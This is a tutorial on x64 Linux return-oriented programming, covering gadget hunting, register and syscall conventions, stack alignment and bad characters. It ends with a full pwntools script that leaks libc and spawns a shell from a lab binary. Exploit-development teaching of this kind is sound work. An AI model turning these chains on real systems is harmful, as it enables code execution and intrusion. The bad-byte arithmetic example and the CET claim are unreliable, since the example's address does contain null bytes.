x64 ROP Chains: Systematic Gadget Hunting

Building ROP chains on x64 Linux - finding gadgets with ropper, handling calling conventions, chaining syscalls, dealing with bad characters, stack alignment, and a complete worked example.

Why x64 ROP Is Different from x86 ROP

Three things change everything when moving from 32-bit to 64-bit ROP:

Register-based calling convention: x86 cdecl pushed every argument on the stack, so a chain that called system("/bin/sh") was mechanically [ret_addr_of_system, junk_return, &"/bin/sh"]. On x64 the first six arguments live in registers, so the chain has to load registers first.
Address space size: every gadget address is now 8 bytes, half of which are usually \x00. If your overflow uses strcpy/strcat/sprintf (anything null-terminated), addresses end-with-null are unusable mid-chain.
Stack alignment: the System V ABI mandates 16-byte RSP alignment immediately before a call instruction. SSE-using libc functions (printf, system) crash on movaps if you violate this.

This post is a systematic walkthrough of how to build chains that survive all three.

x64 Calling Convention

On Linux x64, the first 6 arguments go in registers: rdi, rsi, rdx, rcx, r8, r9. A ROP chain must load these registers via pop; ret gadgets before calling the target function.

Argument	Register	Typical use
1	`rdi`	first pointer/value
2	`rsi`	second pointer/value
3	`rdx`	third pointer/value (also `read`/`write` count)
4	`rcx`	fourth pointer/value (note: syscalls clobber `rcx` - use `r10` for syscall arg 4 instead)
5	`r8`	fifth pointer/value
6	`r9`	sixth pointer/value

Return value lands in rax. Floating-point arguments use xmm0..xmm7 (rare in exploit work). For variadic functions like printf, rax must contain the count of XMM registers used (typically 0 for plain ROP).

Why Registers Make Life Harder

For system("/bin/sh") you need exactly one register (rdi) loaded with a pointer to /bin/sh. For execve("/bin/sh", argv, envp) via syscall you need four registers, plus rax = 59, plus r10 = rcx_clone. Each register requires a pop reg; ret gadget - and the wider you go, the harder it is to find clean ones.

Finding Gadgets

ropper --file vuln --search "pop rdi"
ropper --file vuln --search "pop rsi; pop r15"
ropper --file vuln --search "ret"  # for stack alignment

ropper and ROPgadget are the two standards. Both walk the executable sections, scan backwards from every ret/jmp reg/call reg for any byte sequence that decodes as valid x64 instructions, and emit a list. Use either; pwntools’ ROP() class wraps both internally.

Useful Search Patterns

# Direct register loaders
ropper -f vuln --search 'pop rdi; ret'
ropper -f vuln --search 'pop rsi; ret'
ropper -f vuln --search 'pop rdx; ret'

# Two-register / multi-register variants when single ones don't exist
ropper -f vuln --search 'pop rsi; pop r15; ret'   # very common
ropper -f vuln --search 'pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret'

# Syscall / direct syscall
ropper -f vuln --search 'syscall'
ropper -f vuln --search 'syscall; ret'

# Memory-write primitives
ropper -f vuln --search 'mov qword ptr [rdi], rsi; ret'   # arbitrary 8-byte write
ropper -f vuln --search 'xchg rax, rsp'                   # stack pivot

# Alignment
ropper -f vuln --search 'ret'                              # any clean ret

# Static binaries - search libc bundled into the ELF
ROPgadget --binary vuln | grep ': pop rdx'

Where to Search When the Binary Is Sparse

Small statically-stripped binaries sometimes have no pop rdx; ret at all. Sources of additional gadgets:

Source	When available
`libc.so.6` (after libc leak)	Dynamic binary, libc gadgets after stage-1 leak
`ld-linux-x86-64.so.2`	Always loaded; small but contains a few useful pop-r* / syscall gadgets
`vsyscall` page (`0xffffffffff600000`)	Only on older kernels; contains a few fixed `syscall` entry points
Existing functions used “in the middle”	A function epilogue (`add rsp, X; pop r12; pop r13; pop rbp; ret`) often serves as a multi-pop gadget
`__libc_csu_init` (pre-glibc-2.34)	The Universal-Gadget - a 6-pop epilogue that lets you load r12-r15 + rbp + rbx in one shot

The “csu_init Universal Gadget”

In binaries linked against glibc < 2.34, __libc_csu_init ends with a stylised epilogue that ROP chains love:

__libc_csu_init+90:    pop rbx
__libc_csu_init+91:    pop rbp
__libc_csu_init+92:    pop r12
__libc_csu_init+94:    pop r13
__libc_csu_init+96:    pop r14
__libc_csu_init+98:    pop r15
__libc_csu_init+100:   ret

__libc_csu_init+74:    mov rdx, r15
__libc_csu_init+77:    mov rsi, r14
__libc_csu_init+80:    mov edi, r13d
__libc_csu_init+83:    call qword ptr [r12 + rbx*8]

A two-stage chain: first hit +90 to load all six registers; then jump to +74 to move them into rdx, rsi, edi and call [r12+rbx*8]. This solves the “no pop rdx; ret exists” problem on most pre-2.34 binaries.

In glibc 2.34+, __libc_csu_init has been removed (the init code is part of _start instead) - search elsewhere.

Common x64 ROP Pattern

rop = b""
rop += p64(pop_rdi)        # pop rdi; ret
rop += p64(bin_sh_addr)     # "/bin/sh" string address
rop += p64(ret)             # stack alignment (16-byte)
rop += p64(system_addr)     # system()

This is the canonical “you have a libc leak” payload. The ret between the argument loader and the call to system exists for one purpose only - adding 8 bytes to RSP so that by the time system’s prologue executes its movaps, RSP is 16-aligned.

When You Need More Than Three Lines

A real chain is rarely this clean. Practical considerations:

rop  = p64(pop_rdi) + p64(elf.got['puts'])    # arg1 = puts@got
rop += p64(plt_puts)                          # call puts(puts@got) → leak libc
rop += p64(elf.symbols['main'])               # return to main, restart with libc base known

# After receiving the leak, build chain 2 with libc.address resolved
rop2  = p64(pop_rdi) + p64(libc_binsh)
rop2 += p64(ret_align)
rop2 += p64(libc.symbols['system'])

Syscall ROP Chain

For a direct execve syscall:

rop  = p64(pop_rax) + p64(59)              # syscall number for execve
rop += p64(pop_rdi) + p64(bin_sh)           # filename = "/bin/sh"
rop += p64(pop_rsi) + p64(0)               # argv = NULL
rop += p64(pop_rdx) + p64(0)               # envp = NULL
rop += p64(syscall_ret)                     # syscall; ret

Linux x64 Syscall ABI (vs. function call)

This catches people every time. Function calls use rcx for arg 4. Syscalls use r10 for arg 4 because syscall itself clobbers rcx (the kernel writes rip+2 into rcx for sysret). The common syscalls and their numbers:

#	Name	Args
0	`read`	rdi=fd, rsi=buf, rdx=count
1	`write`	rdi=fd, rsi=buf, rdx=count
2	`open`	rdi=pathname, rsi=flags, rdx=mode
10	`mprotect`	rdi=addr, rsi=len, rdx=prot
59	`execve`	rdi=pathname, rsi=argv, rdx=envp

When `system` Is Off-Limits

Sandboxed CTF binaries frequently seccomp away execve (and fork, clone, etc.), forcing an “open-read-write” chain (ORW):

rop  = p64(pop_rdi) + p64(flag_path)
rop += p64(pop_rsi) + p64(0)                 # O_RDONLY
rop += p64(pop_rax) + p64(2)                 # SYS_open
rop += p64(syscall_ret)                      # rax = fd

rop += p64(pop_rdi) + p64(3)                 # fd (assume 3)
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(0)                 # SYS_read
rop += p64(syscall_ret)

rop += p64(pop_rdi) + p64(1)                 # stdout
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(1)                 # SYS_write
rop += p64(syscall_ret)

Stack Alignment

System V ABI requires 16-byte stack alignment before call. If your chain crashes in system() or printf(), insert an extra ret gadget.

Diagnosing the Crash

The fingerprint of a stack-alignment crash is unmistakable:

gdb-peda$ x/i $rip
=> 0x7f9...:    movaps XMMWORD PTR [rsp+0x50], xmm0
gdb-peda$ p/x $rsp & 0xf
$1 = 0x8       ← off by 8, classic alignment bug

movaps and movdqa require 16-byte aligned operands; an unaligned access raises SIGSEGV. The fix is to ensure RSP & 0xf == 0 immediately before the call, which means immediately after the previous ret, RSP must be 0x...8 (the ret itself pops 8 bytes).

The 8-Byte Rule

After every ret in your chain, RSP advances by 8. If your initial overflow leaves RSP at a known offset, count ret instructions:

Even number of pops between calls → alignment preserved.
Odd number → off by 8, insert a single ret gadget to fix.

In practice, a single bare ret between the last argument-loader and the function call solves 99% of crashes.

Dealing with Bad Characters

If certain bytes (like \x00 or \x0a) are filtered, find alternate gadgets or use add/sub gadget chains to construct addresses without bad bytes.

Common Bad Character Sets

Source of overflow	Likely banned bytes
`gets`, `fgets`	`\x0a` (newline)
`read` from network	usually none, full 8-bit clean
`strcpy`, `strcat`	`\x00`
`scanf("%s", ...)`	whitespace: `\x09 \x0a \x0b \x0c \x0d \x20`
`recv` followed by `strncpy`	`\x00`

Any address ending in \x00 (very common, since the upper bytes of x64 user addresses are \x00\x00) is unusable mid-chain when null-bytes are forbidden - except as the last 8 bytes of the payload.

Building Bad-Byte-Free Addresses

If you need address 0x401234 but \x00 is banned, two tactics:

Compute via arithmetic gadgets:

rop  = p64(pop_rax) + p64(0x10000000401234)   # contains 0x00 in the middle? no
rop += p64(sub_rax_const)
rop += p64(0x10000000000000)                  # subtract to get target
rop += p64(jmp_rax)

sprintf("%s", payload)-style: send the payload past the bad characters and use a gadget to copy it into a clean writable region (.bss, heap), then pivot the stack into the new region (xchg rsp, rax).

Bad Bytes Inside Libc Addresses

After ASLR, libc base typically has the form 0x7f???????????? - the leading 0x7f is rarely a problem, but \x00 mid-chain stays a problem. Same arithmetic-gadget tricks apply, with the leak from stage 1 already in rax.

Worked Example: Tying It All Together

from pwn import *

elf  = ELF('./vuln')
libc = ELF('./libc.so.6')
io   = process('./vuln')

# ---- Gadgets in the binary ----
pop_rdi  = next(elf.search(asm('pop rdi; ret'),  executable=True))
ret_g    = next(elf.search(asm('ret'),           executable=True))

# ---- Stage 1: leak libc through puts ----
chain1  = b'A' * 0x40 + b'B' * 8                         # buffer + saved RBP
chain1 += p64(pop_rdi) + p64(elf.got['puts'])
chain1 += p64(elf.plt['puts'])
chain1 += p64(elf.symbols['main'])

io.sendlineafter(b'> ', chain1)
leak = u64(io.recv(6).ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f'libc base = {hex(libc.address)}')

# ---- Stage 2: execve("/bin/sh", 0, 0) via direct syscall ----
pop_rax     = libc.address + 0x000000000003a738    # pop rax; ret
pop_rsi     = libc.address + 0x000000000002601f    # pop rsi; ret
pop_rdx     = libc.address + 0x0000000000142c92    # pop rdx; ret
syscall_ret = libc.address + 0x0000000000091316    # syscall; ret
binsh       = next(libc.search(b'/bin/sh\x00'))

chain2  = b'A' * 0x40 + b'B' * 8
chain2 += p64(pop_rax) + p64(0x3b)                 # SYS_execve
chain2 += p64(pop_rdi) + p64(binsh)
chain2 += p64(pop_rsi) + p64(0)
chain2 += p64(pop_rdx) + p64(0)
chain2 += p64(ret_g)                                # alignment
chain2 += p64(syscall_ret)

io.sendlineafter(b'> ', chain2)
io.interactive()

A Few More Tactics Worth Knowing

SROP (Sigreturn-Oriented Programming): forge a sigcontext on the stack, return to a sigreturn syscall. One gadget loads all registers at once. Useful when conventional pop reg; ret gadgets are scarce.
JOP/COP: when ret instructions are restricted (rare on Linux, common in some embedded/Windows-CFG-protected binaries), use jmp [reg] or call [reg] chains instead.
mprotect + shellcode: allocate execution permission on a writable region, copy shellcode, jump to it. Lets you escape ROP entirely once you have the primitive.
Stack pivot: xchg rsp, rax, mov rsp, rbp; pop rbp; ret, leave; ret - pivot RSP into a controlled region (e.g. .bss, the heap, or anywhere your input was copied).
CET / Shadow Stack mitigations: Intel CET enforces a parallel shadow stack - every ret checks the saved return address against the shadow copy. Pure ROP fails. SROP, JOP, COP all break CET; future-proof chains favour these.

Master the x64 calling convention and you can build a ROP chain for any binary. The rest is just finding the right gadgets - and the discipline to keep RSP aligned.